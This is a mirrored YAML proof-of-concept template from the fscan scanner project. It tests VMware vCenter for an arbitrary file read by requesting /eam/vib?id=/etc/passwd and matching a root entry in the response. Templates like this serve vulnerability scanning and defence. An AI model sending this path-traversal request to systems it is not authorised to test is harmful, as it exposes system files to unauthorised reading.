mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-11-05 10:45:27 +00:00
12 lines
326 B
YAML
12 lines
326 B
YAML
|
|
name: poc-yaml-vmware-vcenter-arbitrary-file-read2
|
||
|
|
rules:
|
||
|
|
- method: GET
|
||
|
|
path: /eam/vib?id=/etc/passwd
|
||
|
|
follow_redirects: false
|
||
|
|
expression: |
|
||
|
|
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||
|
|
detail:
|
||
|
|
author: MrP01ntSun(https://github.com/MrPointSun)
|
||
|
|
links:
|
||
|
|
- https://t.co/LfvbyBUhF5
|